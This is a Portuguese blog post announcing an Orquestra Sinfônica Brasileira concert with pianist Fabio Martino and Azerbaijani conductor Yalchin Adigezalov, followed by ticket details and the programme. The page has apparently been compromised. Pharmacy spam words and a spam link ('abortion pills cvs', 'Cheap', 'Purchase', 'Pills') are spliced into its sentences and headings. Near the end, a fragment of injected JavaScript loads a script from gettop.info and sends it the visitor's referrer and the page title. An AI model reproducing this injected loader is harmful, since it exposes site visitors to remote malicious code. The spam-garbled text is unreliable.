CuriosidadeMúsica sinfônicaNotíciaProgramaçãoRio de Janeiro

Brasil, Rússia e Azerbaijão nas partituras da OSB

Pianista Fabio Martino interpreta Prokofiev e Mignone; maestro azerbaijanês Yalchin Adigezalov apresenta música de seu país.

 

Brasil, Rússia e Azerbaijão se encontram no próximo concerto da Orquestra Sinfônica Brasileira (OSB), que tem duas apresentações programadas para a estreia das séries Turmalina e Esmeralda: 25 de abril, às 16h, no Theatro Municipal do Rio de Janeiro, pela Turmalina; e 26 de abril, às 18h, na Cidade das Artes, pela Esmeralda.

Com regência do maestro azerbaijanês Yalchin Adigezalov, o concerto tem como atração principal o jovem pianista brasileiro Fabio Martino, vencedor do primeiro Concurso Internacional BNDES de Piano. No programa estão o Concerto para piano n. 2, de S. Prokofiev; a http://edubet.com/2018/02/delivery-aceon/ Fantasia brasileira n. 4 para piano e orquestra, de Francisco Mignone, ambas com solo de Martino; e importantes obras da música de concerto do Azerbaijão, com participação do Trio Garabagh. Os ingressos estão à venda.

Único brasileiro a figurar no time de convidados das séries Turmalina e Esmeralda da OSB, Martino mostra seu virtuosismo na interpretação das obras do russo Prokofiev e do brasileiro Mignone. Esta obra foi escrita após o compositor se mudar para o Rio de janeiro e apresenta elementos inspirados em Ernesto Nazareth. Por isso foi escolhida para celebrar, no concerto, o aniversário da cidade.  online

“As duas obras que tocarei com a OSB me inspiram muito e me enchem de garra e determinação, já que são muito enérgicas e vibrantes. A Fantasia brasileira n. 4 é muito rica e colorida, possui um ritmo forte e marcante. Toda vez que a interpreto sinto o ‘sangue brasileiro’ correndo nas veias! Em contrapartida, o Concerto n. 2 de Prokofiev revela uma música densa, pesada. É desafiador que exige muito fôlego e força. Eu sou apaixonado por ele e amo toda vez que posso tocá-lo com orquestra”, declara o pianista.

Em uma rara oportunidade para conhecer a música de concerto produzida no Azerbaijão, o público apreciará ainda as obras Capriccio azerbaijanês e Canção do árabe cego, do drama de Javid Huseyn, Sheykh Sanan abortion pills cvs , ambas de Fikrat Amirov; Adágio e Cheap Valsa do balé Sete belas Pills , de Gara Garayev; Adágio para kamancha e orquestra, de Haji Khanmammadov; Rapsódia no estilo Chahargah para tar com orquestra, de Hasan Rzayev; Mugam sayagi (Fantasia no estilo mugam), de Asaf Zeynalli; e fragmento do oratório Garabagh shikestesi, de Vasif Adigezalov. Ao lado do maestro Adigezalov, e trazendo ainda mais a cultura do Azerbaijão para o concerto, estará o Trio Garabagh, músicos da região de mesmo nome e que desde 2007 tocam em parceria com o regente. Formado por Elnur Ahmedov, Elchin Hashimov e Mansum Ibrahimov, o trio apresenta ao público instrumentos típicos do país como o kamancha, o tar, e o hanende.

 

Sobre Fabio Martino

Vencedor da primeira edição do Concurso Internacional BNDES de Piano do Rio de Janeiro, em 2010, e do Ton und Erklärung, promovido pelo Circuito Cultural da Economia Alemã, em 2011, Martino é um dos grandes nomes da nova geração de pianistas. Seu primeiro álbum solo traz obras de Brahms, Schumann e a première Purchase da Cheap Terceira sonata para piano, de York Höller, e Três estudos intervalares, de Edino Krieger. Já se apresentou com a OSB, Osesp, Filarmônica de Minas, Sinfônica da Rádio da Baviera e Filarmônica de Duisburg, entre outras.

Sobre Yalchin Adigezalov

Adigezalov graduou-se em regência pelo Conservatório de São Petersburgo e tornou-se mestre pela Academia de Música e Belas Artes de Viena. De 1991 a 1998, foi diretor musical e regente titular da Orquestra Sinfônica do Azerbaijão e, desde 2000, atua como maestro do Teatro de Ópera e Balé, e professor da classe de regência da Academia de Música local. Foi o diretor musical do Mozart Music Festival na Áustria e lançou 11 discos nos EUA. Ao longo de sua carreira, colaborou com solistas como Mstislav Rostropovich, Nikolay Petrov e Sergey Stadler, entre outros.

Purchase Sobre o Trio Garabagh

Aplaudido em turnês pelos EUA, Espanha, Países Baixos, Dinamarca e Suíça, o trio é formado por músicos da região do Garabagh, no Azerbaijão. Desde 2007, sua parceria com o maestro Adigezalov vem levando-os a apresentarem o Mugam Sinfônico em diferentes festivais europeus, ao lado de orquestras da Turquia, Ucrânia, Letônia, Inglaterra e Itália. Os três integrantes atuam como professores do Conservatório Nacional e solistas da Orquestra do Teatro de Ópera e Balé do Azerbaijão.

Foto de Friedrun Reinhold

 

SERVIÇO:

Concertos da Orquestra Sinfônica Brasileira

Yalchin Adigezalov – regência

Fabio Martino – piano

Trio Garabagh: Elnur Ahmedov – kamancha; Elchin Hashimov – tar e mansum Ibrahimov – hanende

 

25 de abril, sábado, às 16h

Theatro Municipal do Rio de Janeiro (Praça Marechal Floriano s/nº, Centro. Tels.: 21 2332‐9191 e 2332‐9005, a partir das 10h)

 

Ingressos: R$ 20 (galeria), R$ 60 (balcão superior), R$ 100 (plateia), R$ 140 (balcão nobre), com descontos de 50% para terceira idade, estudantes, portadores de necessidades especiais e menores de 21 anos.

 

26 de abril, domingo, às 18h

Cidade das Artes (Av. das Américas, 5.300, Barra da Tijuca. Tel.: 21 3325-0102)

Ingressos: R$ 20 (galeria), R$ 60 (camarotes e frisas) e R$ 100 (plateia), com descontos de 50% para maiores de 60 anos, menores de 21 anos, estudantes, pessoas com necessidades especiais e professores da rede municipal de ensino; e de 20% para membros do Programa Travessa Leve, da Livraria da Travessa, e Assinantes OSB. Os descontos são limitados a uma pessoa e não cumulativos.

 

Programa:

Fikrat Amirov – Capriccio azerbaijanês

Francisco Mignone – Fantasia brasileira n. 4 para piano e orquestra

Sergei Prokofiev – Concerto para piano n. 2 em sol menor, Op. 16

Gara Garayev – Adágio e valsa do balé “Sete belas”

Fikrat Amirov – Canção do árabe cego, do drama “Sheykh Sanan”

Haji Khanmammadov – Adágio para kamancha e orquestra

Hasan Rzayev – Rapsódia no estilo Chahargah para tar com orquestra

Asaf Zeynalli – Mugam sayagi (Fantasia no estilo mugam)

Vasif Adigezalov – Fragmento do oratório “Garabagh shikestesi”

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

Faça seu comentário

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.